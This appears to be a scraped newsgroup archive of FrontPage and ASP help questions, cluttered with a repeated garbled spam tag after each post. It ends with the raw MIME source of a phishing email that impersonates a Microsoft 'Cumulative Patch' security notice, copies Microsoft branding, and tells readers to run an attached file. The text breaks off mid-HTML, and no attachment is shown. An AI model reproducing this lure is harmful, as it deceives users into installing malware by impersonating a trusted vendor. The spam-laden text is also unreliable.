Current Issues Article Archive
A growing archive of fascinating media articles on current issues & affairs.
Available at Arcis Foundation Website:
www.arcis.co.uk/php/
--
Posted by News Bulk Poster
Unregistered version Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25581
Any traffic analyser solution?
I am looking for some software that will tell me what my potential customers are
searching for when they get to the site === not what they searched to get to the site.
My reasoning is that I have 6000 products and only list 600 of the best and faster selling
items. If I have what they are looking for not posted to the site, then I could post that
product in the hopes they may come looking again. And then I meet their needs. Do you
offer any solution that a start up business can afford?
I use Webalizer provided IP host but that just tells me what search my customers used to
ARRIVE GET at my web. Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25576
Insert Live Feed
Guys,
How to insert live feed in an ASP page?
Thanks
HB Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25573
Publishing on CD-ROM
I want to publish a website on CD-ROM. I understand it's different that
just copying it. Can anyone help?
Thanks
John Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25567
Database Connection
I need to use the Database Results Wizard to
make a connection to a database that is outside
of the current web. I cannot figure out how to
do this.
My database is in a different folder than my site
on my web server. The layout is like this:
Database Location:
C:\inetpub\wwwPortal\db\database.mdb
Web Site Location:
C:\inetpub\wwwPortal\html
With the DRW, I can only figure out how to
make a connection to the database if it were
in the 'html' folder. As far as I can tell, it will
not let me make a connection to the 'db' folder
that is outside of the web.
I have multiple forms on my site that I am able
to write information to the db. I just cannot
pull information from it using the DRW.
Any help would be appreciated.
Mike Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25559
Frontpage minus XML
Any way of making frontpage only use raw html rather than include xml when
creating web pages?
(Go Blue!) Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25552
Appropriate DOCTYPE for XML Formatting Rules
Hi All,
I have what is quite possibly a stupid question about XML formatting and
DOCTYPE declarations. I am using FrontPage 2003 to apply XML formatting
rules to my web pages by right clicking in the code view and selecting
"Apply XML Formatting Rules". Using the command made changes similar to the
following:
Original Line:
<img src="my_image.gif" width="35" height="9" alt="alt_text">
New Line (the only difference is the forward-slash at the end):
<img src="my_image.gif" width="35" height="9" alt="alt_text" />
My question is: If I use XML formatting is it still appropriate to use the
DOCTYPE declaration shown below or do I have to use some sort of XML
declaration.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
Thank-You,
Kris Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25551
[ANN]: NNTP Server slow downs.
For several days, we have been experiencing slowdowns in the Microsoft
newsgroups. The combination of the recent waves of spam and viruses
generated several issues that Microsoft teams are troubleshooting now. In
the meantime, to help deal with the slowdowns, we are reducing our message
archive from 90 days to 30 days for newsreaders (such as Outlook Express).
To access discussions older than 30 days, you can use this page:
http://www.microsoft.com/communities/newsgroups/default.mspx
Regards,
Microsoft Communities Team Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25535
Display IP address in confirmation form...
Hello, I need to display the IP of the person filling out
a form in my site.
I want it to appear in the confirmation page.
Suggestions???
Please help me, thanx.
jpmaster Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25530
SQL2K Server and IIS 5.0 connectivity with FrontPage 2K
Hello, I hope someone out there can help me understand.
I have an IIS Server and using FP2K, I'm trying to connect to a SQL2K
Server, but I keep getting errors in attempting to connect.
I have searched the newsgroups and had no luck in finding a solution. The
error code that I get, refers to Named Pipe, error 80004005, cannot connect.
Anyone have any ideas?????
Thank you
Luis Aguilar Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25522
ASP SQL String error
I'm, trying to generate a random number to be used in a DB lookup of wav
files that can be used as BG sound bytes.
I'm missing something along the STRSQL = line that's blocking me.
Error Type:
Microsoft VBScript runtime (0x800A000D)
Type mismatch: '[string: "SELECT WavName FROM "]'
/random_number.asp, line 21
The number generates correctly and the field being selected is the primary
index and an integer (autonumber).
I generate an SQL pull that will work correctly with DATABASE results
wizzard, but not with a random number.
Can anyone see a problem in my syntax?
___________________
<%
Dim intLB
Dim intUB
Dim intRange
Dim sngRanVal
Dim intRanInt
Dim DSN_Name
DSN_Name = Application("Web_ConnectionString")
set Connection = Server.CreateObject("ADODB.Connection")
Connection.Open DSN_Name
Set RS = Server.CreateObject("ADODB.Recordset")
intLB = 1
intUB = 30
Randomize()
intRange = intUB - intLB + 1
sngRanVal = intRange * Rnd()
sngRanVal = sngRanVal + intLB
intRanInt = Int(sngRanVal)
strSql = "SELECT WavName FROM WavTable WHERE ( ID = ::'" + intRanInt + "
::)"'"
RS.Open strSql, Connection
Dim SNDFile
SNDFile = rs("wavename")
RS.close
Connection.close
%>
<html>
<head>
<title>Random BG Sound</title>
<bgsound src ="sounds/wavtable/<%=SNDFile%>">
</head>
</body>
</html>
_____________________________________ Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25519
creating a download file
How can I make a file or image file downloadable when
clicked upon? I need for my client to be able to
download there image files if needed from my site. Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25513
Further form query
I posted here a week ago about formatting the emailed results from an FP
form - the emailed results need to be really easy to read. Thanks to those
who answered, saying that FP can't do that.
I've been looking around and I keep coming across ASP, and I gather I can
send the results to an ASP script? This is all completely new to me, but if
anyone could give me any hints as to my next step, or has any experience of
this, I'd be really grateful. Are there scripts you can download and use?
Any help etc... cause it all looks greek to me at the mo...
Likewise Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25512
Downloading
Hi -
I'm not even sure this is the correct newsgroup for this
question: Is there a way for me to add an area on a
webpage for a User to download a picture that I have?
Thanks -
Melissa Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25511
Adding a Date to Records
I'm trying to build a page that updates a feild in a
database of when a record was edited. The pages adds the
date of when the record was entered already. What I need
it away to add a date of when the record was edited and
the user can't change this date.
Thanks,
DeWayne Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25510
Error in newgroup?
Sorry that I ask this in this group -
Yesterday I posted a question under Frontpage - general
questions, but today when I enter the newsgroup, it only
says "Newsgroup not available". None of the 2500 pages
are available.
Is this a current general problem or am I doing something
wrong??
Thanks Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25509
_vti?
Hello!
Does anyone know what are the _vti directories for exactly?
Thanks in advance,
Joanie (aka fairyjo) Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25507
background resizing when display properties is reset.
Using frontpage 2002, using background jpg for top of web
page.
how can I stop the background picture from repeating when
the display properties are changed from 800x600 to
1024x768 ?
thank you
James Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25505
wrapping problem on results page
When data is entered into a submit page without new line
breaks, it is displayed in the results page as one long
line. There doesn't seem to be a way to force a line wrap.
Got any answers?? Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25504
Adding footer to DBase results page...
I wish to add a footer (html) to the bottom of the DBase results pages in my
site.
Problem is, since these pages are dynamically sized, I need the footer
dynamically placed. Something like "x pixels below the DBase region".
To compound the problem, there are lists of links down the left side of the
page. I need the footer to be placed no higher on the page than "x pixels
below the bottom of the list" as well as the above criteria.
So far, I can't even figure out where to place the html for the footer so
that the footer appears at the bottom of the DBase results. I'm sure this is
possilble since FP is placing "buttons" at the bottom of a full page of
results. I've tried several things including [fpdbrgn2.inc] and can't seem
to get anywhere.
For now, I have the footer placed statically at the bottom of the results
page.
If you wish to view, the "home page" for the site is
http://www.zartbooks.com/zartbooks1.html
(Be aware, this site is not yet "live"; don't attempt to purchase anything
yet...)
Any ideas??
Thanks,
skorpion@suespammers.org Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25503
ERROR 2?
I just got a new web site through Interchange. The name
of it "www.sbcyouth.org" is unavailable, because it has
to circulate through the Internet for a few days first.
Well I tried to publish in FP 2000 using its I.P.address,
but when I do I get an error message.
It reads:
Server error 2: Error 2 opening registry
key "SOFTWARE\Microsoft\Shared Tools\Web Server
Extensions\Ports\Port 80".
What's the problem? Can I fix it with "regedit"? How do
I fix it?
Thanks,
James Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25500
Hex characters in JavaScript
Not strictly Front Page but anyway ...
I need to examine a string from an html form text area
field and check for certain characters using the
string.substring(a,b) function or similar.
If the characters are normal like "a" then OK but if a
line throw character is found, I need to replace it with a
normal character like "+".
I guess I need to do some stuff with hex etc.
Something like, say, for the 3rd character of the string :-
linethrowchar = "#0C"; // if this is correct?
if (fieldstring.substring(2,1) == linethrowchar)
{fieldstring.substring(2,1) = "+";}
You get the idea anyway ... does it need eval or something?
When I look around about Hex it always seems to be
something about colors. Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25499
formatting 101
Sorry to ask such a basic question, but how do I ensure
that my website appears the same no matter what
resolution setting a visitor may have? I've discovered
that my site loses its format if the site was not created
using the same resolution as the user... Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25498
Hover Buttons do not display in IE6
Hover buttons work on some computers with IE but not
others. I'm sure it must be an operation system problem
(XP) and not a frontpage problem, but I'm stuck.
Thanks Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25496
Banner Ad Manager Properties
I'm sure this might sound like a silly question, but I'm
really new to FrontPage, so I hope you will be forgiving.
I inserted a Banner Ad in my homepage, inserted 7
pictures for it to flash between. It seems to work
perfectly when I view it IN FRONTPAGE, but when you
actually visit the site, all you see is a lovely gray box
where all this fun stuff should be happening.
What am I doing wrong? (please)
Any help would save many dosages of Aspirin.
Thank you,
Missy Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25495
Embedding pages
Please help me!
Hi all, I'm new to FP2002 and getting very frustrated with
this! I've embedded pages (my left side naviagtion, header
and footer) using the "Include Content" Web Component on
my home page. Here's my problem: In my footer page, I use
CSS for my links (a:link, a:active, a:hover, a:visited).
My CSS works fine on my footer page when I view it. BUT,
when I include the footer page on my home page using the
Include Content Web Component, it includes the actual
footer links, but the CSS won't work. (there isn't any
other CSS in the home page code that could possibly
override it either). Why is this happening and how do i
fix it, and if CSS won't work with the include content
component, is there an alternative to using CSS for my
links? THANK YOU!!!
Sincerely,
Jill Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25494
images
Previews in Front Page work just fine, but when i go to
open the page in a browser my inserted pictures dont' show
and when right clicked redirect to an error page reading
"The requested URL /~----/folder/images/image.jpg was not
found on this server.
Additionally, a 404 Not Found error was encountered while
trying to use an ErrorDocument to handle the request. " Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25490
Quick Hyperlinks and the pesky UP tag
Hi!
I'm a new FP user and have am stumped! In my hyperlink
navigation bar I have a link back to the parent page - its
labeled "UP" by default (via FP).
Can someone help me so that I can get my boss off my
back? He wants it to say "TOP". I don't want to change
it outside of FP because someone will have to remember to
do it after I'm long gone.
I thought I stumbled upon a dialog box once that would let
me change it but I can't remember.
Thanks for the help. Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25489
Format date on ASP
I have two fields that come in from an access database. I
can't change the way they are formatted in the database,
so have to format them in my script when they come in.
Currently I have them both set to come in as mm/dd/yyyy by
using the following: formatdatetime(trim(oRsWD.fields
("first_day_of_month").value ),0)
How can I get the date to be formatted so it appears 09-
Sep-2003??
Thank you!!
Ginni Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25487
Displaying the contents of a file in a text box
Can someone tell me how to display the contents of a file
in a text box. I'm using a single page to display
information from several files that change often. I want
to display the contents of those files without having the
user click on a hyperlink. Thanks! Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25486
Frameset code
I have managed to somehow change the file location of my
frames pages within the code of my frameset. Does anyone
know how I can open and view the frameset code? I can
not seem to find where it is saved. Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25481
Will not display interactive excel database
I'm trying to put a usable database in a clients website,
and it works when it's still on a local drive, but when I
upload it to a server, it shows s blank sqaure with a
picture icon (what it shows before a picture loads on
websites) and the explorer is finished loading
everything. I've tried it on two different server, I put
it on my own server first, and that didn't work, so I
tried one of those free webhost servers "tripod" and that
didn't work. fyi: I am using Internet Explorer 6.01
Please help, Email me at golfandsurf@ec.rr.com
The sooner the better!
Thankyou Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25478
Publishing server web to local computer "My Web"
I can work "live" and edit the website, but when I get
done, I cannot backup the server web to my local computer
as it simply terminates the connection after a while and
I do not have the web published locally. Interland said
it "timed out" and that is a "Front Page" issue. Anyone
have a solution? It just started this recently after
some Office Updates... Tag: FBI FORENSICS CAN FIND DELETED FILES xxxaaaaaaaaaaaasssssssssssssssssssssssssssssaaaaaaaaa\aaaa 5312 [1/4] Tag: 25477
FW: Try corrective package
--ayliiahkqmazaxwl
Content-Type: multipart/related; boundary="jovedlxlcgelgp";
type="multipart/alternative"
--jovedlxlcgelgp
Content-Type: multipart/alternative; boundary="mkijprzodxkhuyhwt"
--mkijprzodxkhuyhwt
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Microsoft Customer
this is the latest version of security update, the
"October 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three new vulnerabilities.
Install now to protect your computer
from these vulnerabilities, the most serious of which could
allow an malicious user to run executable on your system.
This update includes the functionality =
of all previously released patches.
System requirements: Windows 95/98/Me/2000/NT/XP
This update applies to:
- MS Internet Explorer, version 4.01 and later
- MS Outlook, version 8.00 and later
- MS Outlook Express, version 4.01 and later
Recommendation: Customers should install the patch =
at the earliest opportunity.
How to install: Run attached file. Choose Yes on displayed dialog box.
How to use: You don't need to do anything after installing this item.
--mkijprzodxkhuyhwt
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>
<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>
<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A> |
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A> |
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A> |
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>
</FONT>
</TD>
</TR>
<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A> </B>
</FONT>
</TD>
</TR>
</TABLE>
<IMG SRC=3D"cid:zzydedj" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Customer<BR><BR>
this is the latest version of security update, the
"October 2003, Cumulative Patch" update which eliminates
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three new vulnerabilities.
Install now to protect your computer
from these vulnerabilities, the most serious of which could
allow an malicious user to run executable on your system.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>
<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:crppdbd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:crppdbd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> This update applies to</B>
</FONT></TD><TD NOWRAP>
<FONT SIZE=3D"1">
MS Internet Explorer, version 4.01 and later<BR>
MS Outlook, version 8.00 and later<BR>
MS Outlook Express, version 4.01 and later
</FONT>
</TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:crppdbd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> Recommendation</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch =
at the earliest opportunity.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:crppdbd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to install</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Run attached file. =
Choose Yes on displayed dialog box.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:crppdbd" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to use</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">You don't need to do =
anything after installing this item.</FONT></TD>
</TR>
</TABLE>
<BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Product Support Services and Knowledge Base articles
can be found on the <A HREF=3D"http://support.microsoft.com/" =
TARGET=3D"_top">Microsoft Technical Support</A> web site. =
For security-related information about Microsoft products, please =
visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top">
Microsoft Security Advisor</A> web site, =
or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" =
TARGET=3D"_top">Contact Us.</A>
<BR><BR>
Thank you for using Microsoft products.<BR><BR></FONT>
<FONT SIZE=3D"1">Please do not reply to this message. =
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.<BR></FONT>
<HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%">
<FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and =
products mentioned herein are the trademarks =
of their respective owners.</FONT>
</TD></TR></TABLE>
<BR>
<TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB">
<TR VALIGN=3D"TOP">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B>
<A class=3D'navtext'